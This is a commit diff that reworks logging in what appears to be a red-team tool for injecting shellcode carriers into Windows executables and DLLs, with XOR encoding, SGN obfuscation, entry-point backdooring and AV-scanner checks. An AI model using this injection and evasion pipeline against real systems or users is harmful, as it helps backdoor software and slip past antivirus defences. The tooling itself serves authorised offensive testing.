refactor: rework logging

This commit is contained in:
Dobin Rutishauser
2025-06-09 10:10:02 +02:00
parent 4c49f2d816
commit 9ed0469884
12 changed files with 97 additions and 75 deletions
+5 -5
View File
@@ -19,7 +19,7 @@ from app.storage import storage, WebProject
from sender import scannerDetectsBytes
from phases.injector import verify_injected_exe
from phases.templater import get_template_names
from helper import run_process_checkret, run_exe
from helper import run_exe
from model.project import prepare_project
from pe.superpe import SuperPe
import pe.dllresolver
@@ -280,10 +280,10 @@ def start_project(project_name):
if no_exec_arg == "true":
no_exec = True
logger.info("--[ Exec project: {} remote: {} no_exec: {}".format(project_name, remote, no_exec))
logger.info(" Exec project: {} remote: {} no_exec: {}".format(project_name, remote, no_exec))
if remote:
logger.info("--[ Exec {} on server {}".format(project.settings.inject_exe_out, config.get("avred_server")))
logger.info(" Exec {} on server {}".format(project.settings.inject_exe_out, config.get("avred_server")))
with open(project.settings.inject_exe_out, "rb") as f:
data = f.read()
filename = os.path.basename(project.settings.inject_exe_out)
@@ -301,13 +301,13 @@ def start_project(project_name):
else:
# Start/verify it at the end
if project.settings.verify:
logger.info("--[ Verify infected exe")
logger.info(" Verify infected exe")
exit_code = verify_injected_exe(project.settings.inject_exe_out)
elif no_exec == False:
run_exe(project.settings.inject_exe_out, dllfunc=project.settings.dllfunc, check=False)
elif no_exec == True:
dirname = os.path.dirname(os.path.abspath(project.settings.inject_exe_out))
logger.info("--[ Open folder: {}".format(dirname))
logger.info(" Open folder: {}".format(dirname))
subprocess.run(['explorer', dirname])
return redirect("/project/{}".format(project_name), code=302)
+7 -7
View File
@@ -37,8 +37,6 @@ def clean_tmp_files():
def clean_files(settings):
logger.info("--( Remove old files")
files_to_clean = [
# temporary files
settings.main_c_path,
@@ -56,8 +54,8 @@ def run_exe(exefile, dllfunc="", check=True):
if exefile.endswith(".dll"):
if dllfunc == "":
dllfunc = "dllMain"
logger.info("---[ No DLL function specified, using default: {}".format(dllfunc))
#raise Exception("---[ No DLL function specified")
logger.info(" No DLL function specified, using default: {}".format(dllfunc))
#raise Exception(" No DLL function specified")
args = [ "rundll32.exe", "{},{}".format(exefile, dllfunc) ]
elif exefile.endswith(".exe"):
args = [ exefile ]
@@ -97,8 +95,10 @@ def run_process_checkret(args, check=True):
# check return code (optional)
if ret.returncode != 0 and check:
logger.info("----! FAILED Command: {}".format(" ".join(args)))
raise Exception("Command failed: " + " ".join(args))
logger.error("----! FAILED Command: {}".format(" ".join(args)))
logger.warning("----! Stdout:\n {}".format(stdout_s))
logger.warning("----! Stderr:\n {}".format(stderr_s))
raise ChildProcessError("Command failed: " + " ".join(args))
# debug: show command output
if config.ShowCommandOutput:
@@ -108,7 +108,7 @@ def run_process_checkret(args, check=True):
def try_start_shellcode(shc_file):
logger.info("--[ Blindly execute shellcode: {}".format(shc_file))
logger.info(" Blindly execute shellcode: {}".format(shc_file))
subprocess.run([
config.get("path_runshc"),
shc_file,
+1 -1
View File
@@ -82,7 +82,7 @@ class Injectable():
# Data Reuse
def add_datareuse_fixup(self, fixup: DataReuseEntry):
logger.debug("---( Add datareuse: {}".format(fixup.string_ref))
logger.debug(" Add datareuse: {}".format(fixup.string_ref))
self.reusedata_fixups.append(fixup)
def get_all_reusedata_fixups(self) -> List[DataReuseEntry]:
+3 -1
View File
@@ -13,12 +13,14 @@ class Payload():
def init(self) -> bool:
logging.info("-( Load payload: {}".format(self.payload_path))
logging.info("-[ Payload: {}".format(self.payload_path))
if not os.path.exists(self.payload_path):
logger.error("Payload file does not exist: {}".format(self.payload_path))
return False
with open(self.payload_path, 'rb') as f:
self.payload_data = f.read()
logging.info(" Size: {} bytes".format(len(self.payload_data)))
return True
+2 -6
View File
@@ -40,6 +40,8 @@ def prepare_project(project_name, settings):
src = "{}{}/".format(PATH_CARRIER, settings.carrier_name)
dst = "{}{}/".format(PATH_WEB_PROJECT, project_name)
logger.info("-[ Cleanup project: {}".format(project_name))
if not os.path.exists(dst):
os.makedirs(dst)
@@ -59,9 +61,3 @@ def prepare_project(project_name, settings):
continue
os.remove(dst + file)
# copy *.c *.h files from src directory to dst directory
for file in os.listdir(src):
if file.endswith(".c") or file.endswith(".h"):
logger.info("--( Copy {} to {}".format(src + file, dst))
shutil.copy2(src + file, dst)
+3 -3
View File
@@ -32,14 +32,14 @@ class FunctionBackdoorer:
def backdoor_function(self, function_addr: int, shellcode_addr: int, shellcode_len: int):
logger.debug("--[ Backdooring exe function at 0x{:X} with jump to carrier at 0x{:X}".format(function_addr, shellcode_addr))
logger.debug(" Backdooring exe function at 0x{:X} with jump to carrier at 0x{:X}".format(function_addr, shellcode_addr))
addr = self.find_suitable_instruction_addr(function_addr)
if addr is None:
raise Exception("Couldn't find a suitable instruction to backdoor")
compiled_trampoline = assemble_relative_jmp(addr, shellcode_addr)
logger.debug("---[ Backdoor Instruction at 0x{:X} (offset to shellcode: 0x{:X})".format(addr, shellcode_addr - addr))
logger.debug(" Backdoor Instruction at 0x{:X} (offset to shellcode: 0x{:X})".format(addr, shellcode_addr - addr))
# Check for overlap
it = IntervalTree()
@@ -63,7 +63,7 @@ class FunctionBackdoorer:
def find_suitable_instruction_addr(self, startOffset, length=256):
"""Find a instruction to backdoor. Recursively."""
logger.debug("---[ find suitable instruction to hijack starting from 0x{:X} len:{} depthopt:{}".format(
logger.debug(" find suitable instruction to hijack starting from 0x{:X} len:{} depthopt:{}".format(
startOffset, length, self.depth_option))
if self.depth_option == DEPTH_OPTIONS.LEVEL1:
+1 -1
View File
@@ -57,7 +57,7 @@ def extract_code_from_exe_file(exe_file: FilePath) -> bytes:
section = get_code_section(pe)
data: bytes = section.get_data()
data = remove_trailing_null_bytes(data)
logger.debug("---[ Extract code section size: {} / {}".format(
logger.debug(" Extract code section size: {} / {}".format(
len(data), section.Misc_VirtualSize))
pe.close()
return data
+7 -3
View File
@@ -11,7 +11,8 @@ logger = logging.getLogger("Assembler")
def asm_to_shellcode(asm_in: FilePath, build_exe: FilePath) -> bytes:
"""Takes ASM source file asm_in, compiles it into build_exe, extracts its code section and write into shellcode_out"""
logger.info("-[ Assemble to exe: {} -> {}".format(asm_in, build_exe))
logger.info("-[ Carrier: ASM to EXE".format())
logger.info(" Carrier: {} -> {}".format(asm_in, build_exe))
run_process_checkret([
config.get("path_ml64"),
asm_in,
@@ -22,6 +23,9 @@ def asm_to_shellcode(asm_in: FilePath, build_exe: FilePath) -> bytes:
if not os.path.isfile(build_exe):
raise Exception("Compiling failed")
code = extract_code_from_exe_file(build_exe)
logging.info(" Carrier Size: {}".format(
len(code)
))
return code
@@ -30,12 +34,12 @@ def encode_payload(payload: bytes, decoder_style: str) -> bytes:
return bytes(payload)
elif decoder_style == "xor_1":
xor_key = config.xor_key
logger.info("---[ XOR payload with key 0x{:X}".format(xor_key))
logger.debug(" XOR payload with key 0x{:X}".format(xor_key))
xored = bytes([byte ^ xor_key for byte in payload])
return bytes(xored)
elif decoder_style == "xor_2":
xor_key = config.xor_key2
logger.info("---[ XOR2 payload with key {}".format(xor_key))
logger.debug(" XOR2 payload with key {}".format(xor_key))
xored = bytearray(payload)
for i in range(len(xored)):
xored[i] ^= xor_key[i % 2]
+7 -4
View File
@@ -22,7 +22,7 @@ def compile_dev(
asm_out: FilePath,
short_call_patching: bool = False,
):
logger.info("-( Compile C to ASM: {} -> {} ".format(c_in, asm_out))
logger.info("-( Carrier: Compile C to ASM: {} -> {} ".format(c_in, asm_out))
# Compile C To Assembly (text)
run_process_checkret([
@@ -39,8 +39,10 @@ def compile_dev(
asm_text: str = file_readall_text(asm_out)
observer.add_text_file("carrier_asm_orig", asm_text)
logger.info("---[ ASM masm_shc: {} ".format(asm_out))
asm_text_lines: List[str] = parse_asm_text_file(Carrier(), asm_text)
logger.info(" ASM masm_shc: {} ".format(asm_out))
settings = Settings()
injectable = Injectable("test.exe") # ???
asm_text_lines: List[str] = parse_asm_text_file(injectable, asm_text, settings)
asm_text = masm_shc(asm_text_lines)
observer.add_text_file("carrier_asm_cleanup", asm_text)
@@ -54,7 +56,8 @@ def compile(
injectable: Injectable,
settings: Settings,
):
logger.info("-[ Compile C to ASM: {} -> {} ".format(c_in, asm_out))
logger.info("-[ Carrier: Compile C to ASM".format())
logger.info(" Carrier: {} -> {} ".format(c_in, asm_out))
# Compile C To Assembly (text)
run_process_checkret([
+18 -18
View File
@@ -114,7 +114,8 @@ class Injector():
exe_out = self.settings.inject_exe_out
carrier_invoke_style: CarrierInvokeStyle = self.settings.carrier_invoke_style
logger.info("-[ Injecting into {} -> {}".format(exe_in, exe_out))
logger.info("-[ Injecting Carrier".format())
logger.info(" Injectable: {} -> {}".format(exe_in, exe_out))
# Patch IAT (if necessary and wanted)
self.injectable_patch_iat()
@@ -124,7 +125,7 @@ class Injector():
# Special case: DLL exported function direct overwrite
if self.superpe.is_dll() and self.settings.dllfunc != "" and carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
logger.warning("---[ Inject DLL: Overwrite exported function {} with shellcode".format(self.settings.dllfunc))
logger.warning(" Inject DLL: Overwrite exported function {} with shellcode".format(self.settings.dllfunc))
rva = self.superpe.getExportEntryPoint(self.settings.dllfunc)
# Size and sanity checks
@@ -136,13 +137,13 @@ class Injector():
# Inject
carrier_offset = self.superpe.get_offset_from_rva(rva)
logger.info(f'----[ Using DLL Export "{self.settings.dllfunc}" at RVA 0x{rva:X} offset 0x{carrier_offset:X} to overwrite')
logger.info(f'- Using DLL Export "{self.settings.dllfunc}" at RVA 0x{rva:X} offset 0x{carrier_offset:X} to overwrite')
self.superpe.pe.set_bytes_at_offset(carrier_offset, self.carrier_shc)
else: # EXE/DLL
carrier_offset = self.superpe.get_offset_from_rva(self.carrier_rva)
#logger.info("{} {}".format(self.carrier_rva, carrier_offset))
logger.info("--( Inject: Write Carrier to 0x{:X} (0x{:X})".format(
logger.info(" Inject: Write Carrier to 0x{:X} (0x{:X})".format(
self.carrier_rva, carrier_offset))
# Copy the carrier
@@ -156,27 +157,27 @@ class Injector():
elif carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr:
addr = self.superpe.getExportEntryPoint(self.settings.dllfunc)
logger.info("---( Inject DLL: Backdoor {} (0x{:X})".format(
logger.info(" Inject: Backdoor DLL {} (0x{:X})".format(
self.settings.dllfunc, addr))
self.function_backdoorer.backdoor_function(
addr, self.carrier_rva, carrier_shc_len)
else: # EXE
if carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
logger.info("--( Inject EXE: Change Entry Point to 0x{:X}".format(
logger.info(" Inject: Change Entry Point to 0x{:X}".format(
self.carrier_rva))
self.superpe.set_entrypoint(self.carrier_rva)
elif carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr:
addr = self.superpe.get_entrypoint()
logger.info("--( Inject EXE: Backdoor function at entrypoint (0x{:X})".format(
logger.info(" Inject EXE: Backdoor function at entrypoint (0x{:X})".format(
addr))
self.function_backdoorer.backdoor_function(
addr, self.carrier_rva, carrier_shc_len)
logger.info("--( Fix imports and make carrier reference IAT")
logger.info(" Fix imports and make carrier reference IAT")
self.injectable_write_iat_references()
logger.info("--( Insert and reference carrier data")
logger.info(" Insert and reference carrier data")
self.inject_and_reference_data()
# changes from console to UI (no console window) if necessary
@@ -188,7 +189,7 @@ class Injector():
self.superpe.pe.OPTIONAL_HEADER.CheckSum = new_checksum
# We done
logger.info("--( Write to file: {}".format(exe_out))
logger.info("-[ Write to file: {}".format(exe_out))
self.superpe.write_pe_to_file(exe_out)
# Log
@@ -198,13 +199,13 @@ class Injector():
def injectable_patch_iat(self):
logger.info("--( Checking if IAT entries required by carrier are available")
logger.info(" Checking if IAT entries required by carrier are available")
# Patch IAT (if necessary and wanted)
for iatRequest in self.injectable.get_all_iat_requests():
# skip available
addr = self.superpe.get_vaddr_of_iatentry(iatRequest.name)
if addr != None:
logger.debug("---[ Request IAT {} is available at 0x{:X}".format(
logger.debug(" Request IAT {} is available at 0x{:X}".format(
iatRequest.name, addr))
continue
iat_name = self.superpe.get_replacement_iat_for("KERNEL32.dll", iatRequest.name)
@@ -265,9 +266,8 @@ class Injector():
return
# insert data
logger.info("--( DataReuseFixups: Inject the data")
for datareuse_fixup in reusedata_fixups:
logger.debug(" Handling DataReuse Fixup: {} (.code: {})".format(
logger.debug(" Handling DataReuse Fixup: {} (.code: {})".format(
datareuse_fixup.string_ref, datareuse_fixup.in_code))
if datareuse_fixup.in_code: # .text
@@ -277,7 +277,7 @@ class Injector():
if payload_rva == None:
raise Exception("DataReuseFixup: payload_rva is None")
datareuse_fixup.addr = payload_rva + self.injectable.superpe.get_image_base()
logging.debug(" Add to .text at 0x{:X} ({}): {} with size {}".format(
logging.debug(" Add to .text at 0x{:X} ({}): {} with size {}".format(
datareuse_fixup.addr, payload_rva, datareuse_fixup.string_ref, len(datareuse_fixup.data)))
else: # .rdata
@@ -294,11 +294,11 @@ class Injector():
self.superpe.pe.set_bytes_at_rva(data_rva, var_data)
datareuse_fixup.addr = data_rva + self.injectable.superpe.get_image_base()
##
logging.debug(" Add to .rdata at 0x{:X} ({}): {}: {}".format(
logging.debug(" Add to .rdata at 0x{:X} ({}): {}: {}".format(
datareuse_fixup.addr, data_rva, datareuse_fixup.string_ref, ui_string_decode(var_data)))
# replace the placeholder in .text with a LEA instruction to the data we written above
logger.info("--( Datareusefixups: patch code to reference the data")
logger.info(" Datareusefixups: patch code to reference the data")
code = self.superpe.get_code_section_data()
for datareuse_fixup in reusedata_fixups:
ref: DataReuseReference
@@ -327,7 +327,7 @@ class Injector():
def verify_injected_exe(exefile: FilePath, dllfunc="") -> int:
logger.info("---[ Verify infected exe: {} ".format(exefile))
logger.info(" Verify infected exe: {} ".format(exefile))
# remove indicator file
pathlib.Path(VerifyFilename).unlink(missing_ok=True)
+31 -2
View File
@@ -23,10 +23,39 @@ def get_template_names() -> List[str]:
def create_c_from_template(settings: Settings, payload_len: int):
logger.info("-[ Create C from template: {} -> {}".format(
PATH_DECODER, settings.main_c_path))
plugin_decoder = ""
src = "{}{}/".format(PATH_CARRIER, settings.carrier_name)
dst = "{}{}/".format(PATH_WEB_PROJECT, settings.project_name)
logger.info("-[ Carrier create Template: {}".format(
settings.main_c_path))
# copy *.c *.h files from src directory to dst directory
for file in os.listdir(src):
if file.endswith(".c") or file.endswith(".h"):
logger.debug(" Copy {} to {}".format(src + file, dst))
shutil.copy2(src + file, dst)
logger.info(" Carrier: {}".format(
settings.carrier_name))
logger.info(" Carrier: Code into: {}".format(
settings.payload_location.value))
logger.info(" Carrier: Decoder: {}".format(
settings.decoder_style))
logger.info(" Carrier: Invoker: {}".format(
settings.carrier_invoke_style.value))
logger.info(" Carrier AntiEmulation: {}".format(
settings.plugin_antiemulation)
)
logger.info(" Carrier Guardrail: {}".format(
settings.plugin_guardrail)
)
logger.info(" Carrier Decoy: {}".format(
settings.plugin_decoy)
)
# Plugin: VirtualAlloc
filepath_virtualprotect = PATH_VIRTUALPROTECT + "{}.c".format(
settings.plugin_virtualprotect)
+12 -24
View File
@@ -53,7 +53,6 @@ def main():
else:
setup_logging(logging.INFO)
settings.try_start_final_infected_exe = args.start_injected
settings.cleanup_files_on_start = not args.no_clean_at_start
settings.cleanup_files_on_exit =not args.no_clean_at_exit
@@ -146,18 +145,6 @@ def start_real(settings: Settings):
if not project.injectable.superpe.is_64():
raise Exception("Binary is not 64bit: {}".format(project.settings.inject_exe_in))
logger.info("--[ Config: {} {} {} {}".format(
project.settings.carrier_name,
settings.payload_location.value,
project.settings.decoder_style,
project.settings.carrier_invoke_style.value))
logger.info("--[ Plugins: AntiEmulation={} Decoy={} Guardrail={}".format(
project.settings.plugin_antiemulation,
project.settings.plugin_decoy,
project.settings.plugin_guardrail)
)
# Tell user if they attempt to do something stupid
sanity_checks(project.settings)
@@ -184,11 +171,15 @@ def start_real(settings: Settings):
# COMPILE: Carrier to .asm (C -> ASM)
if settings.generate_asm_from_c:
phases.compiler.compile(
c_in = settings.main_c_path,
asm_out = settings.main_asm_path,
injectable = project.injectable,
settings = project.settings)
try:
phases.compiler.compile(
c_in = settings.main_c_path,
asm_out = settings.main_asm_path,
injectable = project.injectable,
settings = project.settings)
except ChildProcessError as e:
logger.error("Error compiling C to ASM: {}".format(e))
return
# we have the carrier-required IAT entries in carrier.iat_requests
# CHECK if all are available in infectable, or abort (early check)
@@ -204,9 +195,6 @@ def start_real(settings: Settings):
asm_in = settings.main_asm_path,
build_exe = settings.main_exe_path)
observer.add_code_file("carrier_shc", carrier_shellcode)
logging.info("> Carrier Size: {} Payload Size: {}".format(
len(carrier_shellcode), len(project.payload.payload_data)
))
# INJECT loader into an exe and do IAT & data references. Big task.
injector = phases.injector.Injector(
@@ -228,7 +216,7 @@ def start_real(settings: Settings):
else:
# Support automated verification (dev)
if settings.verify:
logger.info("--[ Verify infected exe")
logger.info(" Verify infected exe")
payload_exit_code = phases.injector.verify_injected_exe(
settings.inject_exe_out,
dllfunc=settings.dllfunc)
@@ -239,7 +227,7 @@ def start_real(settings: Settings):
def obfuscate_shc_loader(file_shc_in, file_shc_out):
logger.info("--[ Obfuscate shellcode with SGN")
logger.info(" Obfuscate shellcode with SGN")
run_process_checkret([
config.get("path_sgn"),
"--arch=64",
@@ -255,7 +243,7 @@ def obfuscate_shc_loader(file_shc_in, file_shc_out):
def verify_shellcode(shc_name):
logger.info("---[ Verify shellcode: {}".format(shc_name))
logger.info(" Verify shellcode: {}".format(shc_name))
# check if directory exists
if not os.path.exists(os.path.dirname(VerifyFilename)):